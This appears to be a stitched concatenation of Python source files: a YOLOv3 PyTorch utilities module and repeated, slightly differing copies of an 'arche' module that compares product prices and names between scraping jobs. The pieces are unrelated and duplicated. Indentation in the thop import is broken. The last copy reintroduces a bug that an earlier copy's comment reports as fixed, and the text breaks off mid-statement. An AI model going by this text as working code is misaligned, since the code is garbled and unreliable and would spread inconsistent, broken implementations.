        self.decay = lambda x: decay * (1 - math.exp(-x / 2000))  # decay exponential ramp (to help early epochs)
        for p in self.ema.parameters():
            p.requires_grad_(False)  # EMA weights are never trained directly
    def update(self, model):
        # Update EMA parameters in place: ema = d * ema + (1 - d) * model
        with torch.no_grad():
            self.updates += 1
            d = self.decay(self.updates)
            msd = model.module.state_dict() if is_parallel(model) else model.state_dict()  # model state_dict
            for k, v in self.ema.state_dict().items():
                if v.dtype.is_floating_point:  # skip integer buffers (e.g. num_batches_tracked)
                    v *= d
                    v += (1. - d) * msd[k].detach()
    def update_attr(self, model, include=(), exclude=('process_group', 'reducer')):
        # Update EMA attributes: mirror model's plain Python attributes onto self.ema
        copy_attr(self.ema, model, include, exclude)
| # YOLOv3 PyTorch utils
import datetime
import logging
import math
import os
import platform
import subprocess
import time
from contextlib import contextmanager
from copy import deepcopy
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torchvision
try:
import thop # for FLOPS computation
except ImportError:
thop = None
logger = logging.getLogger(__name__)
@contextmanager
def torch_distributed_zero_first(local_rank: int):
    """
    Decorator to make all processes in distributed training wait for each local_master to do something.

    Non-master ranks (local_rank not in {-1, 0}) block on a barrier before the body
    runs; rank 0 hits the matching barrier after the body, releasing them.
    local_rank == -1 means non-distributed: no barriers at all.
    NOTE(review): an exception inside the `with` body skips rank 0's trailing
    barrier and can deadlock the other ranks — confirm callers never raise here.
    """
    if local_rank not in [-1, 0]:
        torch.distributed.barrier()
    yield
    if local_rank == 0:
        torch.distributed.barrier()
def init_torch_seeds(seed=0):
    """Seed torch RNG and set cudnn flags: seed 0 favors reproducibility, others favor speed.

    Speed-reproducibility tradeoff: https://pytorch.org/docs/stable/notes/randomness.html
    """
    torch.manual_seed(seed)
    reproducible = seed == 0
    cudnn.deterministic = reproducible  # slower, bit-exact kernels when seed == 0
    cudnn.benchmark = not reproducible  # autotuned (non-deterministic) kernels otherwise
def date_modified(path=__file__):
    """Human-readable modification date of `path`, e.g. '2021-3-26' (no zero padding)."""
    mtime = datetime.datetime.fromtimestamp(Path(path).stat().st_mtime)
    return f'{mtime.year}-{mtime.month}-{mtime.day}'
def git_describe(path=Path(__file__).parent):  # path must be a directory
    """Return `git describe` output for `path` (e.g. v5.0-5-g3e25f1e), or '' outside a git repo.

    https://git-scm.com/docs/git-describe
    """
    cmd = f'git -C {path} describe --tags --long --always'
    try:
        out = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
        return out.decode()[:-1]  # strip the trailing newline
    except subprocess.CalledProcessError:
        return ''  # not a git repository (or git unavailable)
def select_device(device='', batch_size=None):
    """Resolve a torch.device from a string: '' (auto), 'cpu', 'dml', or CUDA ids like '0' or '0,1,2,3'.

    Side effect: sets CUDA_VISIBLE_DEVICES=-1 when 'cpu' is requested. Logs a
    one-line summary; asserts batch_size is divisible by the GPU count when
    several devices are requested.
    """
    # device = 'cpu' or '0' or '0,1,2,3'
    if (device.lower() == 'dml'):
        return torch.device('dml')  # DirectML backend — bypasses the CUDA path entirely
    s = f'YOLOv3 🚀 {git_describe() or date_modified()} torch {torch.__version__} '  # string
    cpu = device.lower() == 'cpu'
    if cpu:
        os.environ['CUDA_VISIBLE_DEVICES'] = '-1'  # force torch.cuda.is_available() = False
    elif device:  # non-cpu device requested
        # os.environ['CUDA_VISIBLE_DEVICES'] = device  # set environment variable
        assert torch.cuda.is_available(), f'CUDA unavailable, invalid device {device} requested'  # check availability
    cuda = not cpu and torch.cuda.is_available()
    if cuda:
        devices = device.split(',') if device else range(torch.cuda.device_count())  # i.e. 0,1,6,7
        n = len(devices)  # device count
        if n > 1 and batch_size:  # check batch_size is divisible by device_count
            assert batch_size % n == 0, f'batch-size {batch_size} not multiple of GPU count {n}'
        space = ' ' * len(s)  # align subsequent GPU lines under the first
        for i, d in enumerate(devices):
            p = torch.cuda.get_device_properties(i)
            s += f"{'' if i == 0 else space}CUDA:{d} ({p.name}, {p.total_memory / 1024 ** 2}MB)\n"  # bytes to MB
    else:
        s += 'CPU\n'
    logger.info(s.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else s)  # emoji-safe
    return torch.device('cuda:0' if cuda else 'cpu')
def time_synchronized():
    """Return time.time(), synchronizing CUDA first so pending GPU work is included in timings."""
    cuda_ready = torch.cuda.is_available()
    if cuda_ready:
        torch.cuda.synchronize()  # block until all queued kernels finish before reading the clock
    return time.time()
def profile(x, ops, n=100, device=None):
    """Profile forward/backward speed of a module (or list of modules).

    Example:
        x = torch.randn(16, 3, 640, 640)  # input
        m1 = lambda x: x * torch.sigmoid(x)
        m2 = nn.SiLU()
        profile(x, [m1, m2], n=100)  # profile speed over 100 iterations

    Prints one line per op: parameter count, GFLOPS (0 if thop unavailable),
    forward/backward ms, input/output shapes. Returns None.
    """
    device = device or torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
    x = x.to(device)
    x.requires_grad = True
    print(torch.__version__, device.type, torch.cuda.get_device_properties(0) if device.type == 'cuda' else '')
    print(f"\n{'Params':>12s}{'GFLOPS':>12s}{'forward (ms)':>16s}{'backward (ms)':>16s}{'input':>24s}{'output':>24s}")
    for m in ops if isinstance(ops, list) else [ops]:
        m = m.to(device) if hasattr(m, 'to') else m  # move op to target device when possible
        m = m.half() if hasattr(m, 'half') and isinstance(x, torch.Tensor) and x.dtype is torch.float16 else m  # match input dtype
        dtf, dtb, t = 0., 0., [0., 0., 0.]  # dt forward, backward, timestamps
        try:
            flops = thop.profile(m, inputs=(x,), verbose=False)[0] / 1E9 * 2  # GFLOPS
        except Exception:  # thop missing or op unsupported — was a bare except:
            flops = 0
        for _ in range(n):
            t[0] = time_synchronized()
            y = m(x)
            t[1] = time_synchronized()
            try:
                _ = y.sum().backward()
                t[2] = time_synchronized()
            except Exception:  # no backward method — was a bare except:
                t[2] = float('nan')
            dtf += (t[1] - t[0]) * 1000 / n  # ms per op forward
            dtb += (t[2] - t[1]) * 1000 / n  # ms per op backward
        s_in = tuple(x.shape) if isinstance(x, torch.Tensor) else 'list'
        s_out = tuple(y.shape) if isinstance(y, torch.Tensor) else 'list'
        p = sum(x.numel() for x in m.parameters()) if isinstance(m, nn.Module) else 0  # parameter count
        print(f'{p:12}{flops:12.4g}{dtf:16.4g}{dtb:16.4g}{str(s_in):>24s}{str(s_out):>24s}')
def is_parallel(model):
    """True when `model` is wrapped in nn.DataParallel or nn.DistributedDataParallel."""
    parallel_types = (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel)
    return type(model) in parallel_types
def de_parallel(model):
    """Unwrap a DP/DDP-wrapped model; return the bare module, or `model` unchanged."""
    if type(model) in (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel):
        return model.module
    return model
def intersect_dicts(da, db, exclude=()):
    """Entries of `da` whose key is also in `db` with an equal `.shape`, skipping keys containing any `exclude` substring."""
    out = {}
    for key, value in da.items():
        if any(pattern in key for pattern in exclude):
            continue
        if key in db and value.shape == db[key].shape:
            out[key] = value  # da's value wins
    return out
def initialize_weights(model):
    """Apply defaults to every submodule: BatchNorm eps/momentum tweaks, in-place activations."""
    activations = (nn.Hardswish, nn.LeakyReLU, nn.ReLU, nn.ReLU6)
    for module in model.modules():
        kind = type(module)  # exact-type dispatch (subclasses intentionally not matched)
        if kind is nn.Conv2d:
            # conv weight init left at PyTorch defaults
            # (nn.init.kaiming_normal_(module.weight, mode='fan_out', nonlinearity='relu'))
            continue
        if kind is nn.BatchNorm2d:
            module.eps = 1e-3
            module.momentum = 0.03
        elif kind in activations:
            module.inplace = True
def find_modules(model, mclass=nn.Conv2d):
    """Return indices into model.module_list whose entries are instances of `mclass`."""
    indices = []
    for idx, layer in enumerate(model.module_list):
        if isinstance(layer, mclass):
            indices.append(idx)
    return indices
def sparsity(model):
    """Global sparsity: fraction of parameter entries that are exactly zero (0-d tensor)."""
    total = 0.
    zeros = 0.
    for param in model.parameters():
        total += param.numel()
        zeros += (param == 0).sum()
    return zeros / total
def prune(model, amount=0.3):
    """L1-unstructured prune every Conv2d weight to `amount` sparsity, then make it permanent."""
    import torch.nn.utils.prune as prune_utils
    print('Pruning model... ', end='')
    for _, module in model.named_modules():
        if isinstance(module, nn.Conv2d):
            prune_utils.l1_unstructured(module, name='weight', amount=amount)  # zero smallest-magnitude weights
            prune_utils.remove(module, 'weight')  # drop re-param hooks, keep the zeros
    print(' %.3g global sparsity' % sparsity(model))
def fuse_conv_and_bn(conv, bn):
    # Fuse convolution and batchnorm layers https://tehnokv.com/posts/fusing-batchnorm-and-conv/
    # Inference-time fusion: returns a single Conv2d (bias on, gradients off) equivalent
    # to conv followed by bn:
    #   W_fused = diag(gamma / sqrt(var + eps)) @ W_conv
    #   b_fused = (b_conv - mean) * gamma / sqrt(var + eps) + beta
    fusedconv = nn.Conv2d(conv.in_channels,
                          conv.out_channels,
                          kernel_size=conv.kernel_size,
                          stride=conv.stride,
                          padding=conv.padding,
                          groups=conv.groups,
                          bias=True).requires_grad_(False).to(conv.weight.device)
    # prepare filters
    w_conv = conv.weight.clone().view(conv.out_channels, -1)  # each output filter flattened to a row
    w_bn = torch.diag(bn.weight.div(torch.sqrt(bn.eps + bn.running_var)))  # per-channel BN scale on the diagonal
    fusedconv.weight.copy_(torch.mm(w_bn, w_conv).view(fusedconv.weight.shape))
    # prepare spatial bias
    b_conv = torch.zeros(conv.weight.size(0), device=conv.weight.device) if conv.bias is None else conv.bias
    b_bn = bn.bias - bn.weight.mul(bn.running_mean).div(torch.sqrt(bn.running_var + bn.eps))
    fusedconv.bias.copy_(torch.mm(w_bn, b_conv.reshape(-1, 1)).reshape(-1) + b_bn)
    return fusedconv
def model_info(model, verbose=False, img_size=640):
    """Log a model summary: layer/parameter/gradient counts, plus GFLOPS when thop is available.

    img_size may be an int or a [h, w] list, i.e. img_size=640 or img_size=[640, 320].
    With verbose=True also prints a per-parameter table.
    """
    n_p = sum(x.numel() for x in model.parameters())  # number of parameters
    n_g = sum(x.numel() for x in model.parameters() if x.requires_grad)  # number of gradients
    if verbose:
        print('%5s %40s %9s %12s %20s %10s %10s' % ('layer', 'name', 'gradient', 'parameters', 'shape', 'mu', 'sigma'))
        for i, (name, p) in enumerate(model.named_parameters()):
            name = name.replace('module_list.', '')
            print('%5g %40s %9s %12g %20s %10.3g %10.3g' %
                  (i, name, p.requires_grad, p.numel(), list(p.shape), p.mean(), p.std()))
    try:  # FLOPS
        from thop import profile
        stride = max(int(model.stride.max()), 32) if hasattr(model, 'stride') else 32
        img = torch.zeros((1, model.yaml.get('ch', 3), stride, stride), device=next(model.parameters()).device)  # input
        flops = profile(deepcopy(model), inputs=(img,), verbose=False)[0] / 1E9 * 2  # stride GFLOPS
        img_size = img_size if isinstance(img_size, list) else [img_size, img_size]  # expand if int/float
        fs = ', %.1f GFLOPS' % (flops * img_size[0] / stride * img_size[1] / stride)  # scaled to img_size
    except Exception:  # was `except (ImportError, Exception)` — Exception already subsumes ImportError
        fs = ''
    logger.info(f"Model Summary: {len(list(model.modules()))} layers, {n_p} parameters, {n_g} gradients{fs}")
def load_classifier(name='resnet101', n=2):
    """Download a pretrained torchvision classifier and reshape its final FC layer to `n` classes."""
    model = torchvision.models.__dict__[name](pretrained=True)
    # torchvision ResNet preprocessing reference:
    #   input_size = [3, 224, 224], input_space = 'RGB', input_range = [0, 1]
    #   mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]
    # Replace the classification head with a zero-initialized n-way layer
    in_features = model.fc.weight.shape[1]
    model.fc.bias = nn.Parameter(torch.zeros(n), requires_grad=True)
    model.fc.weight = nn.Parameter(torch.zeros(n, in_features), requires_grad=True)
    model.fc.out_features = n
    return model
def scale_img(img, ratio=1.0, same_shape=False, gs=32):  # img(16,3,256,416)
    """Scale a (bs, 3, h, w) batch by `ratio`; unless same_shape, pad/crop so dims are gs-multiples."""
    if ratio == 1.0:
        return img
    h, w = img.shape[2:]
    new_size = (int(h * ratio), int(w * ratio))
    img = F.interpolate(img, size=new_size, mode='bilinear', align_corners=False)  # resize
    if not same_shape:  # round target dims up to the nearest grid-size multiple
        h, w = (math.ceil(dim * ratio / gs) * gs for dim in (h, w))
    return F.pad(img, [0, w - new_size[1], 0, h - new_size[0]], value=0.447)  # 0.447 = ImageNet mean
def copy_attr(a, b, include=(), exclude=()):
    """Copy b's instance attributes onto a; restrict to `include` (when non-empty), drop `exclude` and _private names."""
    for name, value in b.__dict__.items():
        wanted = not include or name in include
        if wanted and not name.startswith('_') and name not in exclude:
            setattr(a, name, value)
class ModelEMA:
    """ Model Exponential Moving Average from https://github.com/rwightman/pytorch-image-models
    Keep a moving average of everything in the model state_dict (parameters and buffers).
    This is intended to allow functionality like
    https://www.tensorflow.org/api_docs/python/tf/train/ExponentialMovingAverage
    A smoothed version of the weights is necessary for some training schemes to perform well.
    This class is sensitive where it is initialized in the sequence of model init,
    GPU assignment and distributed training wrappers.
    """
    def __init__(self, model, decay=0.9999, updates=0):
        # Create EMA: a frozen, eval-mode deepcopy of the (DP/DDP-unwrapped) model
        self.ema = deepcopy(model.module if is_parallel(model) else model).eval()  # FP32 EMA
        # if next(model.parameters()).device.type != 'cpu':
        #     self.ema.half()  # FP16 EMA
        self.updates = updates  # number of EMA updates performed so far
        self.decay = lambda x: decay * (1 - math.exp(-x / 2000))  # decay exponential ramp (to help early epochs)
        for p in self.ema.parameters():
            p.requires_grad_(False)  # EMA weights are never trained directly
    def update(self, model):
        # Update EMA parameters in place: ema = d * ema + (1 - d) * model
        with torch.no_grad():
            self.updates += 1
            d = self.decay(self.updates)
            msd = model.module.state_dict() if is_parallel(model) else model.state_dict()  # model state_dict
            for k, v in self.ema.state_dict().items():
                if v.dtype.is_floating_point:  # skip integer buffers (e.g. num_batches_tracked)
                    v *= d
                    v += (1. - d) * msd[k].detach()
    def update_attr(self, model, include=(), exclude=('process_group', 'reducer')):
        # Update EMA attributes: mirror model's plain Python attributes onto self.ema
        copy_attr(self.ema, model, include, exclude)
|
from arche.readers.schema import TaggedFields
from arche.rules.result import Result
from arche.tools.helpers import is_number, ratio_diff
import pandas as pd
def compare_was_now(df: pd.DataFrame, tagged_fields: TaggedFields):
    """Compare `product_price_was_field` and `product_price_field` tagged fields.

    Flags items whose past price is below the current price (error) or equal to
    it (warning). Adds an info message when either tag is missing from the
    schema or the dataframe. Returns a Result.
    """
    price_was_fields = tagged_fields.get("product_price_was_field")
    price_fields = tagged_fields.get("product_price_field")
    items_number = len(df.index)
    result = Result("Compare Price Was And Now")
    if (
        price_was_fields
        and price_was_fields[0] in df.columns
        and price_fields
        and price_fields[0] in df.columns
    ):
        price_field = price_fields[0]
        price_was_field = price_was_fields[0]
        prices = df.copy()
        prices[price_was_field] = prices[price_was_field].astype(float)
        prices[price_field] = prices[price_field].astype(float)
        df_prices_less = pd.DataFrame(
            prices[prices[price_was_field] < prices[price_field]],
            columns=["_key", price_was_field, price_field],
        )
        price_less_percent = "{:.2%}".format(len(df_prices_less) / items_number)
        if not df_prices_less.empty:
            error = f"Past price is less than current for {len(df_prices_less)} items"
            result.add_error(
                f"{price_less_percent} ({len(df_prices_less)}) of "
                f"items with {price_was_field} < {price_field}",
                # BUG FIX: inner quotes must differ from the f-string delimiter —
                # f"…{list(x["_key"])}" is a SyntaxError on Python < 3.12 (PEP 701)
                detailed=f"{error}:\n{list(df_prices_less['_key'])}",
            )
        df_prices_equals = pd.DataFrame(
            prices[prices[price_was_field] == prices[price_field]],
            columns=["_key", price_was_field, price_field],
        )
        price_equal_percent = "{:.2%}".format(len(df_prices_equals) / items_number)
        if not df_prices_equals.empty:
            result.add_warning(
                (
                    f"{price_equal_percent} ({len(df_prices_equals)}) "
                    f"of items with {price_was_field} = {price_field}"
                ),
                detailed=(
                    f"Prices equal for {len(df_prices_equals)} items:\n"
                    f"{list(df_prices_equals['_key'])}"  # same quote fix as above
                ),
            )
        result.err_items_count = len(df_prices_equals) + len(df_prices_less)
        result.items_count = len(df.index)
    else:
        result.add_info(
            "product_price_field or product_price_was_field tags were not "
            "found in schema"
        )
    return result
def compare_prices_for_same_urls(
    source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
    """For each pair of items that have the same `product_url_field` tagged field,
    compare `product_price_field` field
    Returns:
        A result containing pairs of items with same `product_url_field`
        from `source_df` and `target_df` which `product_price_field` differ
        (by more than 10%), missing and new `product_url_field` tagged fields.
    """
    result = Result("Compare Prices For Same Urls")
    url_field = tagged_fields.get("product_url_field")
    if not url_field:
        result.add_info("product_url_field tag is not set")
        return result
    url_field = url_field[0]  # tags map to a list of field names; only the first is used
    price_field = tagged_fields.get("product_price_field")
    source_df = source_df.dropna(subset=[url_field])
    target_df = target_df.dropna(subset=[url_field])
    # Partition urls: present in both / only in source (new) / only in target (missing)
    same_urls = source_df[(source_df[url_field].isin(target_df[url_field].values))][
        url_field
    ]
    new_urls = source_df[~(source_df[url_field].isin(target_df[url_field].values))][
        url_field
    ]
    missing_urls = target_df[(~target_df[url_field].isin(source_df[url_field].values))][
        url_field
    ]
    missing_detailed_messages = []
    for url in missing_urls:
        key = target_df.loc[target_df[url_field] == url]["_key"].iloc[0]
        missing_detailed_messages.append(f"Missing {url} from {key}")
    result.add_info(
        f"{len(missing_urls)} urls missing from the tested job",
        detailed="\n".join(missing_detailed_messages),
    )
    result.add_info(f"{len(new_urls)} new urls in the tested job")
    result.add_info(f"{len(same_urls)} same urls in both jobs")
    diff_prices_count = 0
    if not price_field:
        result.add_info("product_price_field tag is not set")
    else:
        price_field = price_field[0]
        detailed_messages = []
        for url in same_urls:
            if url.strip() != "nan":  # skip stringified NaN urls
                source_price = source_df[source_df[url_field] == url][price_field].iloc[
                    0
                ]
                target_price = target_df[target_df[url_field] == url][price_field].iloc[
                    0
                ]
                if (
                    is_number(source_price)
                    and is_number(target_price)
                    and ratio_diff(source_price, target_price) > 0.1
                ):
                    # prices differ by more than 10% — flag the pair
                    diff_prices_count += 1
                    source_key = source_df[source_df[url_field] == url]["_key"].iloc[0]
                    target_key = target_df[target_df[url_field] == url]["_key"].iloc[0]
                    msg = (
                        f"different prices for url: {url}\nsource price is {source_price} "
                        f"for {source_key}\ntarget price is {target_price} for {target_key}"
                    )
                    detailed_messages.append(msg)
        res = f"{len(same_urls)} checked, {diff_prices_count} errors"
        if detailed_messages:
            result.add_error(res, detailed="\n".join(detailed_messages))
        else:
            result.add_info(res)
    return result
def compare_names_for_same_urls(
    source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
    """For each pair of items that have the same `product_url_field` tagged field,
    compare `name_field` field.

    Returns a Result on every path (previously a bare `return` leaked None when
    the name field was absent from either dataframe's columns).
    """
    result = Result("Compare Names Per Url")
    url_field = tagged_fields.get("product_url_field")
    if not url_field:
        result.add_info("product_url_field tag is not set")
        return result
    url_field = url_field[0]  # tags map to a list of field names; only the first is used
    name_field = tagged_fields.get("name_field")
    diff_names_count = 0
    if not name_field:
        result.add_info("name_field tag is not set")
        return result
    name_field = name_field[0]
    if any(
        [
            name_field not in source_df.columns.values,
            name_field not in target_df.columns.values,
        ]
    ):
        # BUG FIX: was a bare `return` (None) — callers expect a Result on every path
        return result
    same_urls = source_df[(source_df[url_field].isin(target_df[url_field].values))][
        url_field
    ]
    detailed_messages = []
    for url in same_urls:
        if url.strip() != "nan":  # skip stringified NaN urls
            source_name = source_df[source_df[url_field] == url][name_field].iloc[0]
            target_name = target_df[target_df[url_field] == url][name_field].iloc[0]
            if (
                source_name != target_name
                and source_name.strip() != "nan"
                and target_name.strip() != "nan"
            ):
                diff_names_count += 1
                source_key = source_df[source_df[url_field] == url]["_key"].iloc[0]
                target_key = target_df[target_df[url_field] == url]["_key"].iloc[0]
                msg = (
                    f"different names for url: {url}\nsource name is {source_name} "
                    f"for {source_key}\ntarget name is {target_name} for {target_key}"
                )
                detailed_messages.append(msg)
    res = f"{len(same_urls)} checked, {diff_names_count} errors"
    if detailed_messages:
        result.add_error(res, detailed="\n".join(detailed_messages))
    else:
        result.add_info(res)
    return result
def compare_prices_for_same_names(
    source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
    """For each pair of items sharing the same `name_field` tagged field, compare
    `product_price_field`; also report missing and new names.

    Returns a Result with info on missing/new/same names and errors for name
    pairs whose prices differ by more than 10%.
    """
    result = Result("Compare Prices For Same Names")
    name_field = tagged_fields.get("name_field")
    if not name_field:
        result.add_info("name_field tag is not set")
        return result
    name_field = name_field[0]  # tags map to a list of field names; only the first is used
    product_url_field = tagged_fields.get("product_url_field")
    if not product_url_field:
        result.add_info("product_url_field tag is not set")
    else:
        product_url_field = product_url_field[0]
    source_df = source_df[source_df[name_field].notnull()]
    target_df = target_df[target_df[name_field].notnull()]
    # Partition names: present in both / only in source (new) / only in target (missing)
    same_names = source_df[(source_df[name_field].isin(target_df[name_field].values))][
        name_field
    ]
    new_names = source_df[~(source_df[name_field].isin(target_df[name_field].values))][
        name_field
    ]
    missing_names = target_df[
        ~(target_df[name_field].isin(source_df[name_field].values))
    ][name_field]
    detailed_messages = []
    for name in missing_names:
        target_key = target_df.loc[target_df[name_field] == name]["_key"].iloc[0]
        msg = f"Missing {name} from {target_key}"
        if product_url_field:
            url = target_df.loc[target_df[name_field] == name][product_url_field].iloc[
                0
            ]
            msg = f"{msg}\n{url}"
        # BUG FIX: append unconditionally — missing-name details were silently
        # dropped whenever product_url_field was not tagged
        detailed_messages.append(msg)
    result.add_info(
        f"{len(missing_names)} names missing from the tested job",
        detailed="\n".join(detailed_messages),
    )
    result.add_info(f"{len(new_names)} new names in the tested job")
    result.add_info(f"{len(same_names)} same names in both jobs")
    price_tag = "product_price_field"
    price_field = tagged_fields.get(price_tag)
    if not price_field:
        result.add_info("product_price_field tag is not set")
        return result
    price_field = price_field[0]
    count = 0
    detailed_messages = []
    for name in same_names:
        if name.strip() != "nan":  # skip stringified NaN names
            source_price = source_df[source_df[name_field] == name][price_field].iloc[0]
            target_price = target_df[target_df[name_field] == name][price_field].iloc[0]
            if is_number(source_price) and is_number(target_price):
                if ratio_diff(source_price, target_price) > 0.1:  # >10% difference
                    count += 1
                    source_key = source_df[source_df[name_field] == name]["_key"].iloc[
                        0
                    ]
                    target_key = target_df[target_df[name_field] == name]["_key"].iloc[
                        0
                    ]
                    msg = (
                        f"different price for {name}\nsource price is {source_price} "
                        f"for {source_key}\ntarget price is {target_price} for {target_key}"
                    )
                    detailed_messages.append(msg)
    result_msg = f"{len(same_names)} checked, {count} errors"
    if detailed_messages:
        result.add_error(result_msg, detailed="\n".join(detailed_messages))
    else:
        result.add_info(result_msg)
    return result
| from arche.readers.schema import TaggedFields
from arche.rules.result import Result
from arche.tools.helpers import is_number, ratio_diff
import pandas as pd
def compare_was_now(df: pd.DataFrame, tagged_fields: TaggedFields):
    """Compare price_was and price_now tagged fields.

    Flags items whose past price is below the current price (error) or equal to
    it (warning); adds an info message when either tag is missing from the
    schema or the dataframe. Returns a Result.
    """
    price_was_fields = tagged_fields.get("product_price_was_field")
    price_fields = tagged_fields.get("product_price_field")
    items_number = len(df.index)
    result = Result("Compare Price Was And Now")
    if (
        price_was_fields
        and price_was_fields[0] in df.columns
        and price_fields
        and price_fields[0] in df.columns
    ):
        price_field = price_fields[0]
        price_was_field = price_was_fields[0]
        prices = df.copy()  # copy so astype() below never mutates the caller's frame
        prices[price_was_field] = prices[price_was_field].astype(float)
        prices[price_field] = prices[price_field].astype(float)
        df_prices_less = pd.DataFrame(
            prices[prices[price_was_field] < prices[price_field]],
            columns=["_key", price_was_field, price_field],
        )
        price_less_percent = "{:.2%}".format(len(df_prices_less) / items_number)
        if not df_prices_less.empty:
            error = f"Past price is less than current for {len(df_prices_less)} items"
            result.add_error(
                f"{price_less_percent} ({len(df_prices_less)}) of "
                f"items with {price_was_field} < {price_field}",
                detailed=f"{error}:\n{list(df_prices_less['_key'])}",
            )
        df_prices_equals = pd.DataFrame(
            prices[prices[price_was_field] == prices[price_field]],
            columns=["_key", price_was_field, price_field],
        )
        price_equal_percent = "{:.2%}".format(len(df_prices_equals) / items_number)
        if not df_prices_equals.empty:
            result.add_warning(
                (
                    f"{price_equal_percent} ({len(df_prices_equals)}) "
                    f"of items with {price_was_field} = {price_field}"
                ),
                detailed=(
                    f"Prices equal for {len(df_prices_equals)} items:\n"
                    f"{list(df_prices_equals['_key'])}"
                ),
            )
        result.err_items_count = len(df_prices_equals) + len(df_prices_less)
        result.items_count = len(df.index)
    else:
        result.add_info(
            "product_price_field or product_price_was_field tags were not "
            "found in schema"
        )
    return result
def compare_prices_for_same_urls(
    source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
    """For each pair of items that have the same `product_url_field` tagged field,
    compare `product_price_field` field
    Returns:
        A result containing pairs of items with same `product_url_field`
        from `source_df` and `target_df` which `product_price_field` differ
        (by more than 10%), missing and new `product_url_field` tagged fields.
    """
    result = Result("Compare Prices For Same Urls")
    url_field = tagged_fields.get("product_url_field")
    if not url_field:
        result.add_info("product_url_field tag is not set")
        return result
    url_field = url_field[0]  # tags map to a list of field names; only the first is used
    price_field = tagged_fields.get("product_price_field")
    source_df = source_df.dropna(subset=[url_field])
    target_df = target_df.dropna(subset=[url_field])
    # Partition urls: present in both / only in source (new) / only in target (missing)
    same_urls = source_df[(source_df[url_field].isin(target_df[url_field].values))][
        url_field
    ]
    new_urls = source_df[~(source_df[url_field].isin(target_df[url_field].values))][
        url_field
    ]
    missing_urls = target_df[(~target_df[url_field].isin(source_df[url_field].values))][
        url_field
    ]
    missing_detailed_messages = []
    for url in missing_urls:
        key = target_df.loc[target_df[url_field] == url]["_key"].iloc[0]
        missing_detailed_messages.append(f"Missing {url} from {key}")
    result.add_info(
        f"{len(missing_urls)} urls missing from the tested job",
        detailed="\n".join(missing_detailed_messages),
    )
    result.add_info(f"{len(new_urls)} new urls in the tested job")
    result.add_info(f"{len(same_urls)} same urls in both jobs")
    diff_prices_count = 0
    if not price_field:
        result.add_info("product_price_field tag is not set")
    else:
        price_field = price_field[0]
        detailed_messages = []
        for url in same_urls:
            if url.strip() != "nan":  # skip stringified NaN urls
                source_price = source_df[source_df[url_field] == url][price_field].iloc[
                    0
                ]
                target_price = target_df[target_df[url_field] == url][price_field].iloc[
                    0
                ]
                if (
                    is_number(source_price)
                    and is_number(target_price)
                    and ratio_diff(source_price, target_price) > 0.1
                ):
                    # prices differ by more than 10% — flag the pair
                    diff_prices_count += 1
                    source_key = source_df[source_df[url_field] == url]["_key"].iloc[0]
                    target_key = target_df[target_df[url_field] == url]["_key"].iloc[0]
                    msg = (
                        f"different prices for url: {url}\nsource price is {source_price} "
                        f"for {source_key}\ntarget price is {target_price} for {target_key}"
                    )
                    detailed_messages.append(msg)
        res = f"{len(same_urls)} checked, {diff_prices_count} errors"
        if detailed_messages:
            result.add_error(res, detailed="\n".join(detailed_messages))
        else:
            result.add_info(res)
    return result
def compare_names_for_same_urls(
    source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
    """For each pair of items that have the same `product_url_field` tagged field,
    compare `name_field` field.

    Returns a Result on every path (previously a bare `return` leaked None when
    the name field was absent from either dataframe's columns).
    """
    result = Result("Compare Names Per Url")
    url_field = tagged_fields.get("product_url_field")
    if not url_field:
        result.add_info("product_url_field tag is not set")
        return result
    url_field = url_field[0]  # tags map to a list of field names; only the first is used
    name_field = tagged_fields.get("name_field")
    diff_names_count = 0
    if not name_field:
        result.add_info("name_field tag is not set")
        return result
    name_field = name_field[0]
    if any(
        [
            name_field not in source_df.columns.values,
            name_field not in target_df.columns.values,
        ]
    ):
        # BUG FIX: was a bare `return` (None) — callers expect a Result on every path
        return result
    same_urls = source_df[(source_df[url_field].isin(target_df[url_field].values))][
        url_field
    ]
    detailed_messages = []
    for url in same_urls:
        if url.strip() != "nan":  # skip stringified NaN urls
            source_name = source_df[source_df[url_field] == url][name_field].iloc[0]
            target_name = target_df[target_df[url_field] == url][name_field].iloc[0]
            if (
                source_name != target_name
                and source_name.strip() != "nan"
                and target_name.strip() != "nan"
            ):
                diff_names_count += 1
                source_key = source_df[source_df[url_field] == url]["_key"].iloc[0]
                target_key = target_df[target_df[url_field] == url]["_key"].iloc[0]
                msg = (
                    f"different names for url: {url}\nsource name is {source_name} "
                    f"for {source_key}\ntarget name is {target_name} for {target_key}"
                )
                detailed_messages.append(msg)
    res = f"{len(same_urls)} checked, {diff_names_count} errors"
    if detailed_messages:
        result.add_error(res, detailed="\n".join(detailed_messages))
    else:
        result.add_info(res)
    return result
def compare_prices_for_same_names(
    source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
    """Compare `product_price_field` values between items of two jobs that
    share the same `name_field` value, and report names that are missing
    from the tested job."""
    result = Result("Compare Prices For Same Names")

    name_tag = tagged_fields.get("name_field")
    if not name_tag:
        result.add_info("name_field tag is not set")
        return result
    name_field = name_tag[0]

    product_url_field = tagged_fields.get("product_url_field")
    if not product_url_field:
        result.add_info("product_url_field tag is not set")
    else:
        product_url_field = product_url_field[0]

    # Drop items without a name before matching the two jobs against each other.
    source_df = source_df[source_df[name_field].notnull()]
    target_df = target_df[target_df[name_field].notnull()]

    in_target = source_df[name_field].isin(target_df[name_field].values)
    same_names = source_df[in_target][name_field]
    new_names = source_df[~in_target][name_field]
    missing_names = target_df[
        ~(target_df[name_field].isin(source_df[name_field].values))
    ][name_field]

    details = []
    for name in missing_names:
        matches = target_df.loc[target_df[name_field] == name]
        msg = f"Missing {name} from {matches['_key'].iloc[0]}"
        if product_url_field:
            url = matches[product_url_field].iloc[0]
            details.append(f"{msg}\n{url}")
    result.add_info(
